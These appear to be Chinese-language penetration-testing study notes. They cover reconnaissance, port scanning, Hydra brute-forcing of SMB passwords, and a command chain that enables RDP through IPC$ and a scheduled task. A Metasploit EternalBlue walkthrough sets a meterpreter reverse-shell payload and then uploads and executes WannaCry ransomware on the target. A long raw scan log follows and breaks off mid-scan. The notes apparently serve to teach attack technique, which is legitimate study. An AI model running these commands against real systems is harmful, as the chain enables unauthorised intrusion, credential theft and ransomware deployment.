情报搜集技术

外围信息搜索
- 通过DNS和IP地址挖掘目标网络信息
  - nslookup根据域名查询IP
    - nslookup
    - DNS记录类型
      - A 记录 - 把一个域名解析为一个IPv4地址
      - AAAA记录 - 把一个域名解析为IPv6地址
      - PTR - 把一个IP地址解析成域名
      - CNAME - 把一个域名解析成另一个域名
  - whois域名注册信息查询（中国-新网，阿里云）
    - 域名
    - 域名持有人
    - 域名持有人电话
    - 域名持有人邮箱
    - DNS服务器所属
  - IP2Location地理位置查询 - wwwmaxmind.com 通过IP地址查询服务器经纬度
  - 使用设备搜索引擎直接搜索目标信息
    - https://www.shodan.io
    - https://www.zoomeye.org
- 通过搜索引擎进行信息搜集
  - Google Hacking技术
    - 在百度或google搜索特定字段获取有价值攻击点
    - inurl: - 搜索URL中包含某些字符的页面
    - filetype: - 搜索指定的文件类型
    - intext: - 搜索网页内容中包含某些字符的页面
  - 搜索网站的目录结构 - 对开放目录权限的web站点进行搜索来获取关键参数
    - .bak文件：脚本备份文件
    - .txt/.sql文件：网站的SQL脚本，透露数据库结构等信息
    - inc文件夹：包含网站配置信息，如数据库账户和密码
    - admin文件夹：后台管理目录
    - manage文件家：后台管理目录
  - 检索特定类型的文件
    - 对链接到网站上的文件进行搜索类获取关键信息 - admin.php/database.php
    - robots.txt - 网站不希望爬虫程序去爬的目录地址，一般是有价值的目录
  - 搜索网站中的E-mail地址 - 可为后续钓鱼邮件或者社工手段提供目标
  - 搜索存在的SQL注入点页面
    - 登陆页面
    - 详细内容页面 - URL中通过？来传递参数
主机探测与端口扫描
- 活跃主机扫描
  - PINIG命令
  - 扫描工具 - Zenmap/Nmap
  - 扫描目标地址的整个C段类
- 操作系统识别
  - 抓取数据包判断
  - 扫描工具
- 端口扫描与服务类型探测
  - telnet 端口号，仅用于探测TCP端口
  - 扫描工具
服务扫描与查点
- 常见网络服务扫描
  - Telnet服务扫描
    - 远程登录服务，允许网络中的用户远程以命令行方式控制本机
    - 端口TCP 23
  - SSH服务扫描
    - 更加安全的远程控制
    - 端口TCP22
  - 远程桌面
    - RDP服务
    - 端口TCP3389
  - FTP服务
    - 端口号TCP20、21
  - SMB
    - 文件共享服务，Windows端口445
    - Windows Server默认会开放整个磁盘的共享 \\ip\C$
  - WWW服务
    - HTTP 端口TCP80
    - HTTPS 端口TCP443
  - 数据库服务查点
    - MySQL: TCP 3306
    - SQLServer: TCP 1433
    - Oracle: TCP 1521
  - 开放代理探测与利用 - 隐藏真实IP地址
    - 端口8000、8080
- 口令猜测与嗅探
  - SSH口令猜测
  - FTP口令猜测
  - 远程桌面口令猜测
  - TELNET口令猜测
  - Web后台登陆口令猜解
  - ......
  - 工具：Hydra
```
hydra -l administrator -P /home/kali/Downloads/password.txt 192.168.50.210 smb 
```
  - 暴力破解
    - 使用穷举法来对密码进行逐个猜解
    - 使用字典来提高破解效率
  - 扫描提权步骤
    1. 通过nmap扫描目标地址段，获取目标IP地址，操作系统版本以及端口信息
    2. 使用Hydra破解Windows SMB服务的管理员账户密码
    3. 把开始3389的BAT程序通过C盘隐藏共享上传到目标主机
    4. 远程在目标主机上创建计划任务，定时执行BAT程序，使目标主机开启3389
    5. 使用远程桌面登陆目标主机，获取完全控制权
```
cd/
net use \\192.168.50.210\ipc$    //建立目标主机空连接
net time \\192.168.50.210        //获取目标主机的系统时间

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  //新建开启3389的bat脚本，上传到目标机器

at \\192.168.50.210 09:19:00 c:\a.bat  //添加一个定时作业，自动执行3389开启命令
```
    高版本的SMB2已经修复该漏洞。

网络漏洞扫描

扫描方式
- 黑盒扫描
- 白盒扫描

扫描对象分类

全面扫描主机安全漏洞
- AWVS
- AppScan
- Tenable

扫描特定漏洞

Metasploit
1. 打开Metasploit
2. msf>search ms17-010 \搜索ms17-010漏洞的利用模块
3. msf>use auxiliary/scanner/smb/smb_ms17_010 \调用ms17-010漏洞扫描模块
4. msf>auxiliary(scanner/smb/smb_ms17_010) set threads 20
5. msf>auxiliary(scanner/smb/smb_ms17_010) set rhosts 192.168.50.0/24
6. msf>auxiliary(scanner/smb/smb_ms17_010) run \\开始扫描
7. 扫描结果出来后，开始攻击
8. msf> exploit(windows/smb/ms17_010_eternalblue) \调用永恒之蓝漏洞攻击模块
9. msf> exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/reverse_tcp
10. msf> exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.50.210 \\设置攻击目标
11. msf> exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.50.55 \\设置反弹目标
12. msf> exploit(windows/smb/ms17_010_eternalblue) > exploit \\发起攻击
13. 成功进入对方系统，获得对方系统控制权
14. rdesktop IP 登陆系统
15. meterpreter> upload c:\ wcry.ext c:\\ \\上传勒索病毒至对方计算机
16. meterpreter> execute -f c:\wcry.exe \\执行勒索病毒

┌──(kali㉿kali)-[~]
└─$ msfconsole
[!] The following modules could not be loaded!..|
[!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/host_id.go
[!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/onprem_enum.go
[!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/exchange_enum.go
[!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/wproxy/att_open_proxy.py
[!] Please see /home/kali/.msf4/logs/framework.log for details.

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v6.1.5-dev                           ]
+ -- --=[ 2163 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Use help <command> to learn more
about any command

msf6 > search MS17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 20
threads => 20
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.50.0/24
rhosts => 192.168.50.0/24
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 192.168.50.1:445      - Host does NOT appear vulnerable.
[-] 192.168.50.8:445      - Rex::HostUnreachable: The host (192.168.50.8:445) was unreachable.
[-] 192.168.50.10:445     - Rex::HostUnreachable: The host (192.168.50.10:445) was unreachable.
[-] 192.168.50.2:445      - Rex::HostUnreachable: The host (192.168.50.2:445) was unreachable.
[-] 192.168.50.4:445      - Rex::HostUnreachable: The host (192.168.50.4:445) was unreachable.
[-] 192.168.50.9:445      - Rex::HostUnreachable: The host (192.168.50.9:445) was unreachable.
[-] 192.168.50.5:445      - Rex::HostUnreachable: The host (192.168.50.5:445) was unreachable.
[-] 192.168.50.11:445     - Rex::HostUnreachable: The host (192.168.50.11:445) was unreachable.
[-] 192.168.50.13:445     - Rex::HostUnreachable: The host (192.168.50.13:445) was unreachable.
[-] 192.168.50.12:445     - Rex::HostUnreachable: The host (192.168.50.12:445) was unreachable.
[-] 192.168.50.6:445      - Rex::HostUnreachable: The host (192.168.50.6:445) was unreachable.
[-] 192.168.50.0:445      - Rex::HostUnreachable: The host (192.168.50.0:445) was unreachable.
[-] 192.168.50.3:445      - Rex::HostUnreachable: The host (192.168.50.3:445) was unreachable.
[-] 192.168.50.18:445     - Rex::HostUnreachable: The host (192.168.50.18:445) was unreachable.
[-] 192.168.50.7:445      - Rex::HostUnreachable: The host (192.168.50.7:445) was unreachable.
[-] 192.168.50.19:445     - Rex::HostUnreachable: The host (192.168.50.19:445) was unreachable.
[-] 192.168.50.15:445     - Rex::HostUnreachable: The host (192.168.50.15:445) was unreachable.
[-] 192.168.50.17:445     - Rex::HostUnreachable: The host (192.168.50.17:445) was unreachable.
[-] 192.168.50.14:445     - Rex::HostUnreachable: The host (192.168.50.14:445) was unreachable.
[-] 192.168.50.16:445     - Rex::HostUnreachable: The host (192.168.50.16:445) was unreachable.
[-] 192.168.50.20:445     - Rex::HostUnreachable: The host (192.168.50.20:445) was unreachable.
[-] 192.168.50.21:445     - Rex::HostUnreachable: The host (192.168.50.21:445) was unreachable.
[-] 192.168.50.33:445     - Rex::HostUnreachable: The host (192.168.50.33:445) was unreachable.
[-] 192.168.50.25:445     - Rex::HostUnreachable: The host (192.168.50.25:445) was unreachable.
[-] 192.168.50.29:445     - Rex::HostUnreachable: The host (192.168.50.29:445) was unreachable.
[-] 192.168.50.36:445     - Rex::HostUnreachable: The host (192.168.50.36:445) was unreachable.
[-] 192.168.50.26:445     - Rex::HostUnreachable: The host (192.168.50.26:445) was unreachable.
[-] 192.168.50.22:445     - Rex::HostUnreachable: The host (192.168.50.22:445) was unreachable.
[-] 192.168.50.34:445     - Rex::HostUnreachable: The host (192.168.50.34:445) was unreachable.
[-] 192.168.50.24:445     - Rex::HostUnreachable: The host (192.168.50.24:445) was unreachable.
[-] 192.168.50.35:445     - Rex::HostUnreachable: The host (192.168.50.35:445) was unreachable.
[-] 192.168.50.37:445     - Rex::HostUnreachable: The host (192.168.50.37:445) was unreachable.
[-] 192.168.50.28:445     - Rex::HostUnreachable: The host (192.168.50.28:445) was unreachable.
[-] 192.168.50.23:445     - Rex::HostUnreachable: The host (192.168.50.23:445) was unreachable.
[-] 192.168.50.38:445     - Rex::HostUnreachable: The host (192.168.50.38:445) was unreachable.
[-] 192.168.50.32:445     - Rex::HostUnreachable: The host (192.168.50.32:445) was unreachable.
[-] 192.168.50.27:445     - Rex::HostUnreachable: The host (192.168.50.27:445) was unreachable.
[-] 192.168.50.30:445     - Rex::HostUnreachable: The host (192.168.50.30:445) was unreachable.
[-] 192.168.50.31:445     - Rex::HostUnreachable: The host (192.168.50.31:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned  28 of 256 hosts (10% complete)
[-] 192.168.50.39:445     - Rex::HostUnreachable: The host (192.168.50.39:445) was unreachable.
[-] 192.168.50.40:445     - Rex::HostUnreachable: The host (192.168.50.40:445) was unreachable.
[-] 192.168.50.41:445     - Rex::HostUnreachable: The host (192.168.50.41:445) was unreachable.
[-] 192.168.50.51:445     - Rex::HostUnreachable: The host (192.168.50.51:445) was unreachable.
[-] 192.168.50.54:445     - Rex::HostUnreachable: The host (192.168.50.54:445) was unreachable.
[-] 192.168.50.48:445     - Rex::HostUnreachable: The host (192.168.50.48:445) was unreachable.
[-] 192.168.50.47:445     - Rex::HostUnreachable: The host (192.168.50.47:445) was unreachable.
[-] 192.168.50.52:445     - Rex::HostUnreachable: The host (192.168.50.52:445) was unreachable.
[-] 192.168.50.59:445     - Rex::HostUnreachable: The host (192.168.50.59:445) was unreachable.
[-] 192.168.50.42:445     - Rex::HostUnreachable: The host (192.168.50.42:445) was unreachable.
[-] 192.168.50.56:445     - Rex::HostUnreachable: The host (192.168.50.56:445) was unreachable.
[-] 192.168.50.49:445     - Rex::HostUnreachable: The host (192.168.50.49:445) was unreachable.
[-] 192.168.50.58:445     - Rex::HostUnreachable: The host (192.168.50.58:445) was unreachable.
[-] 192.168.50.53:445     - Rex::HostUnreachable: The host (192.168.50.53:445) was unreachable.
[-] 192.168.50.57:445     - Rex::HostUnreachable: The host (192.168.50.57:445) was unreachable.
[-] 192.168.50.43:445     - Rex::HostUnreachable: The host (192.168.50.43:445) was unreachable.
[-] 192.168.50.46:445     - Rex::HostUnreachable: The host (192.168.50.46:445) was unreachable.
[-] 192.168.50.55:445     - Rex::HostUnreachable: The host (192.168.50.55:445) was unreachable.
[-] 192.168.50.44:445     - Rex::HostUnreachable: The host (192.168.50.44:445) was unreachable.
[-] 192.168.50.50:445     - Rex::HostUnreachable: The host (192.168.50.50:445) was unreachable.
[-] 192.168.50.45:445     - Rex::HostUnreachable: The host (192.168.50.45:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned  55 of 256 hosts (21% complete)
[-] 192.168.50.60:445     - Rex::HostUnreachable: The host (192.168.50.60:445) was unreachable.
[-] 192.168.50.61:445     - Rex::HostUnreachable: The host (192.168.50.61:445) was unreachable.
[-] 192.168.50.68:445     - Rex::HostUnreachable: The host (192.168.50.68:445) was unreachable.
[-] 192.168.50.62:445     - Rex::HostUnreachable: The host (192.168.50.62:445) was unreachable.
[-] 192.168.50.65:445     - Rex::HostUnreachable: The host (192.168.50.65:445) was unreachable.
[-] 192.168.50.64:445     - Rex::HostUnreachable: The host (192.168.50.64:445) was unreachable.
[-] 192.168.50.63:445     - Rex::HostUnreachable: The host (192.168.50.63:445) was unreachable.
[-] 192.168.50.74:445     - Rex::HostUnreachable: The host (192.168.50.74:445) was unreachable.
[-] 192.168.50.71:445     - Rex::HostUnreachable: The host (192.168.50.71:445) was unreachable.
[-] 192.168.50.66:445     - Rex::HostUnreachable: The host (192.168.50.66:445) was unreachable.
[-] 192.168.50.72:445     - Rex::HostUnreachable: The host (192.168.50.72:445) was unreachable.
[-] 192.168.50.79:445     - Rex::HostUnreachable: The host (192.168.50.79:445) was unreachable.
[-] 192.168.50.69:445     - Rex::HostUnreachable: The host (192.168.50.69:445) was unreachable.
[-] 192.168.50.76:445     - Rex::HostUnreachable: The host (192.168.50.76:445) was unreachable.
[-] 192.168.50.70:445     - Rex::HostUnreachable: The host (192.168.50.70:445) was unreachable.
[-] 192.168.50.77:445     - Rex::HostUnreachable: The host (192.168.50.77:445) was unreachable.
[-] 192.168.50.73:445     - Rex::HostUnreachable: The host (192.168.50.73:445) was unreachable.
[-] 192.168.50.78:445     - Rex::HostUnreachable: The host (192.168.50.78:445) was unreachable.
[-] 192.168.50.67:445     - Rex::HostUnreachable: The host (192.168.50.67:445) was unreachable.
[-] 192.168.50.75:445     - Rex::HostUnreachable: The host (192.168.50.75:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned  79 of 256 hosts (30% complete)
[-] 192.168.50.80:445     - Rex::HostUnreachable: The host (192.168.50.80:445) was unreachable.
[-] 192.168.50.81:445     - Rex::HostUnreachable: The host (192.168.50.81:445) was unreachable.
[-] 192.168.50.85:445     - Rex::HostUnreachable: The host (192.168.50.85:445) was unreachable.
[-] 192.168.50.82:445     - Rex::HostUnreachable: The host (192.168.50.82:445) was unreachable.
[-] 192.168.50.83:445     - Rex::HostUnreachable: The host (192.168.50.83:445) was unreachable.
[-] 192.168.50.86:445     - Rex::HostUnreachable: The host (192.168.50.86:445) was unreachable.
[-] 192.168.50.84:445     - Rex::HostUnreachable: The host (192.168.50.84:445) was unreachable.
[-] 192.168.50.88:445     - Rex::HostUnreachable: The host (192.168.50.88:445) was unreachable.
[-] 192.168.50.89:445     - Rex::HostUnreachable: The host (192.168.50.89:445) was unreachable.
[-] 192.168.50.87:445     - Rex::HostUnreachable: The host (192.168.50.87:445) was unreachable.
[-] 192.168.50.99:445     - Rex::HostUnreachable: The host (192.168.50.99:445) was unreachable.
[-] 192.168.50.90:445     - Rex::HostUnreachable: The host (192.168.50.90:445) was unreachable.
[-] 192.168.50.96:445     - Rex::HostUnreachable: The host (192.168.50.96:445) was unreachable.
[-] 192.168.50.94:445     - Rex::HostUnreachable: The host (192.168.50.94:445) was unreachable.
[-] 192.168.50.93:445     - Rex::HostUnreachable: The host (192.168.50.93:445) was unreachable.
[-] 192.168.50.97:445     - Rex::HostUnreachable: The host (192.168.50.97:445) was unreachable.
[-] 192.168.50.91:445     - Rex::HostUnreachable: The host (192.168.50.91:445) was unreachable.
[-] 192.168.50.92:445     - Rex::HostUnreachable: The host (192.168.50.92:445) was unreachable.
[-] 192.168.50.98:445     - Rex::HostUnreachable: The host (192.168.50.98:445) was unreachable.
[-] 192.168.50.100:445    - Rex::HostUnreachable: The host (192.168.50.100:445) was unreachable.
[-] 192.168.50.101:445    - Rex::HostUnreachable: The host (192.168.50.101:445) was unreachable.
[-] 192.168.50.105:445    - Rex::HostUnreachable: The host (192.168.50.105:445) was unreachable.
[-] 192.168.50.102:445    - Rex::HostUnreachable: The host (192.168.50.102:445) was unreachable.
[-] 192.168.50.103:445    - Rex::HostUnreachable: The host (192.168.50.103:445) was unreachable.
[-] 192.168.50.106:445    - Rex::HostUnreachable: The host (192.168.50.106:445) was unreachable.
[-] 192.168.50.104:445    - Rex::HostUnreachable: The host (192.168.50.104:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned 106 of 256 hosts (41% complete)
[-] 192.168.50.109:445    - Rex::HostUnreachable: The host (192.168.50.109:445) was unreachable.
[-] 192.168.50.107:445    - Rex::HostUnreachable: The host (192.168.50.107:445) was unreachable.
[-] 192.168.50.108:445    - Rex::HostUnreachable: The host (192.168.50.108:445) was unreachable.
[-] 192.168.50.111:445    - Rex::HostUnreachable: The host (192.168.50.111:445) was unreachable.
[-] 192.168.50.113:445    - Rex::HostUnreachable: The host (192.168.50.113:445) was unreachable.
[-] 192.168.50.116:445    - Rex::HostUnreachable: The host (192.168.50.116:445) was unreachable.
[-] 192.168.50.110:445    - Rex::HostUnreachable: The host (192.168.50.110:445) was unreachable.
[-] 192.168.50.112:445    - Rex::HostUnreachable: The host (192.168.50.112:445) was unreachable.
[-] 192.168.50.114:445    - Rex::HostUnreachable: The host (192.168.50.114:445) was unreachable.
[-] 192.168.50.117:445    - Rex::HostUnreachable: The host (192.168.50.117:445) was unreachable.
[-] 192.168.50.115:445    - Rex::HostUnreachable: The host (192.168.50.115:445) was unreachable.
[-] 192.168.50.118:445    - Rex::HostUnreachable: The host (192.168.50.118:445) was unreachable.
[-] 192.168.50.119:445    - Rex::HostUnreachable: The host (192.168.50.119:445) was unreachable.
[-] 192.168.50.124:445    - Rex::HostUnreachable: The host (192.168.50.124:445) was unreachable.
[-] 192.168.50.121:445    - Rex::HostUnreachable: The host (192.168.50.121:445) was unreachable.
[-] 192.168.50.122:445    - Rex::HostUnreachable: The host (192.168.50.122:445) was unreachable.
[-] 192.168.50.123:445    - Rex::HostUnreachable: The host (192.168.50.123:445) was unreachable.
[-] 192.168.50.125:445    - Rex::HostUnreachable: The host (192.168.50.125:445) was unreachable.
[-] 192.168.50.120:445    - Rex::HostUnreachable: The host (192.168.50.120:445) was unreachable.
[-] 192.168.50.126:445    - Rex::HostUnreachable: The host (192.168.50.126:445) was unreachable.
[-] 192.168.50.128:445    - Rex::HostUnreachable: The host (192.168.50.128:445) was unreachable.
[-] 192.168.50.127:445    - Rex::HostUnreachable: The host (192.168.50.127:445) was unreachable.
[-] 192.168.50.129:445    - Rex::HostUnreachable: The host (192.168.50.129:445) was unreachable.
[-] 192.168.50.130:445    - Rex::HostUnreachable: The host (192.168.50.130:445) was unreachable.
[-] 192.168.50.133:445    - Rex::HostUnreachable: The host (192.168.50.133:445) was unreachable.
[-] 192.168.50.134:445    - Rex::HostUnreachable: The host (192.168.50.134:445) was unreachable.
[-] 192.168.50.131:445    - Rex::HostUnreachable: The host (192.168.50.131:445) was unreachable.
[-] 192.168.50.136:445    - Rex::HostUnreachable: The host (192.168.50.136:445) was unreachable.
[-] 192.168.50.135:445    - Rex::HostUnreachable: The host (192.168.50.135:445) was unreachable.
[-] 192.168.50.132:445    - Rex::HostUnreachable: The host (192.168.50.132:445) was unreachable.
[-] 192.168.50.95:445     - Rex::ConnectionTimeout: The connection with (192.168.50.95:445) timed out.
[*] 192.168.50.0/24:445   - Scanned 137 of 256 hosts (53% complete)
[-] 192.168.50.153:445    - Rex::ConnectionRefused: The connection was refused by the remote host (192.168.50.153:445).
[-] 192.168.50.137:445    - Rex::HostUnreachable: The host (192.168.50.137:445) was unreachable.
[-] 192.168.50.138:445    - Rex::HostUnreachable: The host (192.168.50.138:445) was unreachable.
[-] 192.168.50.142:445    - Rex::HostUnreachable: The host (192.168.50.142:445) was unreachable.
[-] 192.168.50.140:445    - Rex::HostUnreachable: The host (192.168.50.140:445) was unreachable.
[-] 192.168.50.141:445    - Rex::HostUnreachable: The host (192.168.50.141:445) was unreachable.
[-] 192.168.50.143:445    - Rex::HostUnreachable: The host (192.168.50.143:445) was unreachable.
[-] 192.168.50.139:445    - Rex::HostUnreachable: The host (192.168.50.139:445) was unreachable.
[-] 192.168.50.144:445    - Rex::HostUnreachable: The host (192.168.50.144:445) was unreachable.
[-] 192.168.50.145:445    - Rex::HostUnreachable: The host (192.168.50.145:445) was unreachable.
[-] 192.168.50.154:445    - Rex::HostUnreachable: The host (192.168.50.154:445) was unreachable.
[-] 192.168.50.156:445    - Rex::HostUnreachable: The host (192.168.50.156:445) was unreachable.
[-] 192.168.50.148:445    - Rex::HostUnreachable: The host (192.168.50.148:445) was unreachable.
[-] 192.168.50.155:445    - Rex::HostUnreachable: The host (192.168.50.155:445) was unreachable.
[-] 192.168.50.147:445    - Rex::HostUnreachable: The host (192.168.50.147:445) was unreachable.
[-] 192.168.50.151:445    - Rex::HostUnreachable: The host (192.168.50.151:445) was unreachable.
[-] 192.168.50.149:445    - Rex::HostUnreachable: The host (192.168.50.149:445) was unreachable.
[-] 192.168.50.150:445    - Rex::HostUnreachable: The host (192.168.50.150:445) was unreachable.
[-] 192.168.50.152:445    - Rex::HostUnreachable: The host (192.168.50.152:445) was unreachable.
[-] 192.168.50.146:445    - Rex::HostUnreachable: The host (192.168.50.146:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned 157 of 256 hosts (61% complete)
[-] 192.168.50.175:445    - An SMB Login Error occurred while connecting to the IPC$ tree.
[-] 192.168.50.157:445    - Rex::HostUnreachable: The host (192.168.50.157:445) was unreachable.
[-] 192.168.50.158:445    - Rex::HostUnreachable: The host (192.168.50.158:445) was unreachable.
[-] 192.168.50.159:445    - Rex::HostUnreachable: The host (192.168.50.159:445) was unreachable.
[-] 192.168.50.165:445    - Rex::HostUnreachable: The host (192.168.50.165:445) was unreachable.
[-] 192.168.50.163:445    - Rex::HostUnreachable: The host (192.168.50.163:445) was unreachable.
[-] 192.168.50.160:445    - Rex::HostUnreachable: The host (192.168.50.160:445) was unreachable.
[-] 192.168.50.162:445    - Rex::HostUnreachable: The host (192.168.50.162:445) was unreachable.
[-] 192.168.50.161:445    - Rex::HostUnreachable: The host (192.168.50.161:445) was unreachable.
[-] 192.168.50.164:445    - Rex::HostUnreachable: The host (192.168.50.164:445) was unreachable.
[-] 192.168.50.166:445    - Rex::HostUnreachable: The host (192.168.50.166:445) was unreachable.
[-] 192.168.50.169:445    - Rex::HostUnreachable: The host (192.168.50.169:445) was unreachable.
[-] 192.168.50.167:445    - Rex::HostUnreachable: The host (192.168.50.167:445) was unreachable.
[-] 192.168.50.168:445    - Rex::HostUnreachable: The host (192.168.50.168:445) was unreachable.
[-] 192.168.50.171:445    - Rex::HostUnreachable: The host (192.168.50.171:445) was unreachable.
[-] 192.168.50.170:445    - Rex::HostUnreachable: The host (192.168.50.170:445) was unreachable.
[-] 192.168.50.172:445    - Rex::HostUnreachable: The host (192.168.50.172:445) was unreachable.
[-] 192.168.50.173:445    - Rex::HostUnreachable: The host (192.168.50.173:445) was unreachable.
[-] 192.168.50.176:445    - Rex::HostUnreachable: The host (192.168.50.176:445) was unreachable.
[-] 192.168.50.174:445    - Rex::HostUnreachable: The host (192.168.50.174:445) was unreachable.
[-] 192.168.50.177:445    - Rex::HostUnreachable: The host (192.168.50.177:445) was unreachable.
[-] 192.168.50.179:445    - Rex::HostUnreachable: The host (192.168.50.179:445) was unreachable.
[-] 192.168.50.178:445    - Rex::HostUnreachable: The host (192.168.50.178:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned 180 of 256 hosts (70% complete)
[-] 192.168.50.180:445    - Rex::HostUnreachable: The host (192.168.50.180:445) was unreachable.
[-] 192.168.50.183:445    - Rex::HostUnreachable: The host (192.168.50.183:445) was unreachable.
[-] 192.168.50.185:445    - Rex::HostUnreachable: The host (192.168.50.185:445) was unreachable.
[-] 192.168.50.184:445    - Rex::HostUnreachable: The host (192.168.50.184:445) was unreachable.
[-] 192.168.50.181:445    - Rex::HostUnreachable: The host (192.168.50.181:445) was unreachable.
[-] 192.168.50.186:445    - Rex::HostUnreachable: The host (192.168.50.186:445) was unreachable.
[-] 192.168.50.182:445    - Rex::HostUnreachable: The host (192.168.50.182:445) was unreachable.
[-] 192.168.50.187:445    - Rex::HostUnreachable: The host (192.168.50.187:445) was unreachable.
[-] 192.168.50.189:445    - Rex::HostUnreachable: The host (192.168.50.189:445) was unreachable.
[-] 192.168.50.188:445    - Rex::HostUnreachable: The host (192.168.50.188:445) was unreachable.
[-] 192.168.50.195:445    - Rex::HostUnreachable: The host (192.168.50.195:445) was unreachable.
[-] 192.168.50.192:445    - Rex::HostUnreachable: The host (192.168.50.192:445) was unreachable.
[-] 192.168.50.194:445    - Rex::HostUnreachable: The host (192.168.50.194:445) was unreachable.
[-] 192.168.50.193:445    - Rex::HostUnreachable: The host (192.168.50.193:445) was unreachable.
[-] 192.168.50.191:445    - Rex::HostUnreachable: The host (192.168.50.191:445) was unreachable.
[-] 192.168.50.196:445    - Rex::HostUnreachable: The host (192.168.50.196:445) was unreachable.
[-] 192.168.50.190:445    - Rex::HostUnreachable: The host (192.168.50.190:445) was unreachable.
[-] 192.168.50.199:445    - Rex::HostUnreachable: The host (192.168.50.199:445) was unreachable.
[-] 192.168.50.198:445    - Rex::HostUnreachable: The host (192.168.50.198:445) was unreachable.
[-] 192.168.50.197:445    - Rex::HostUnreachable: The host (192.168.50.197:445) was unreachable.
[-] 192.168.50.200:445    - Rex::HostUnreachable: The host (192.168.50.200:445) was unreachable.
[-] 192.168.50.204:445    - Rex::HostUnreachable: The host (192.168.50.204:445) was unreachable.
[-] 192.168.50.206:445    - Rex::HostUnreachable: The host (192.168.50.206:445) was unreachable.
[-] 192.168.50.201:445    - Rex::HostUnreachable: The host (192.168.50.201:445) was unreachable.
[-] 192.168.50.205:445    - Rex::HostUnreachable: The host (192.168.50.205:445) was unreachable.
[-] 192.168.50.202:445    - Rex::HostUnreachable: The host (192.168.50.202:445) was unreachable.
[-] 192.168.50.203:445    - Rex::HostUnreachable: The host (192.168.50.203:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned 206 of 256 hosts (80% complete)
[-] 192.168.50.207:445    - Rex::HostUnreachable: The host (192.168.50.207:445) was unreachable.
[-] 192.168.50.208:445    - Rex::HostUnreachable: The host (192.168.50.208:445) was unreachable.
[-] 192.168.50.209:445    - Rex::HostUnreachable: The host (192.168.50.209:445) was unreachable.
[-] 192.168.50.210:445    - Rex::HostUnreachable: The host (192.168.50.210:445) was unreachable.
[-] 192.168.50.211:445    - Rex::HostUnreachable: The host (192.168.50.211:445) was unreachable.
[-] 192.168.50.213:445    - Rex::HostUnreachable: The host (192.168.50.213:445) was unreachable.
[-] 192.168.50.216:445    - Rex::HostUnreachable: The host (192.168.50.216:445) was unreachable.
[-] 192.168.50.212:445    - Rex::HostUnreachable: The host (192.168.50.212:445) was unreachable.
[-] 192.168.50.214:445    - Rex::HostUnreachable: The host (192.168.50.214:445) was unreachable.
[-] 192.168.50.215:445    - Rex::HostUnreachable: The host (192.168.50.215:445) was unreachable.
[-] 192.168.50.234:445    - Rex::ConnectionRefused: The connection was refused by the remote host (192.168.50.234:445).
[-] 192.168.50.219:445    - Rex::HostUnreachable: The host (192.168.50.219:445) was unreachable.
[-] 192.168.50.218:445    - Rex::HostUnreachable: The host (192.168.50.218:445) was unreachable.
[-] 192.168.50.217:445    - Rex::HostUnreachable: The host (192.168.50.217:445) was unreachable.
[-] 192.168.50.220:445    - Rex::HostUnreachable: The host (192.168.50.220:445) was unreachable.
[-] 192.168.50.222:445    - Rex::HostUnreachable: The host (192.168.50.222:445) was unreachable.
[-] 192.168.50.221:445    - Rex::HostUnreachable: The host (192.168.50.221:445) was unreachable.
[-] 192.168.50.227:445    - Rex::HostUnreachable: The host (192.168.50.227:445) was unreachable.
[-] 192.168.50.225:445    - Rex::HostUnreachable: The host (192.168.50.225:445) was unreachable.
[-] 192.168.50.224:445    - Rex::HostUnreachable: The host (192.168.50.224:445) was unreachable.
[-] 192.168.50.226:445    - Rex::HostUnreachable: The host (192.168.50.226:445) was unreachable.
[-] 192.168.50.223:445    - Rex::HostUnreachable: The host (192.168.50.223:445) was unreachable.
[-] 192.168.50.229:445    - Rex::HostUnreachable: The host (192.168.50.229:445) was unreachable.
[-] 192.168.50.228:445    - Rex::HostUnreachable: The host (192.168.50.228:445) was unreachable.
[*] 192.168.50.0/24:445   - Scanned 231 of 256 hosts (90% complete)
[-] 192.168.50.230:445    - Rex::HostUnreachable: The host (192.168.50.230:445) was unreachable.
[-] 192.168.50.231:445    - Rex::HostUnreachable: The host (192.168.50.231:445) was unreachable.
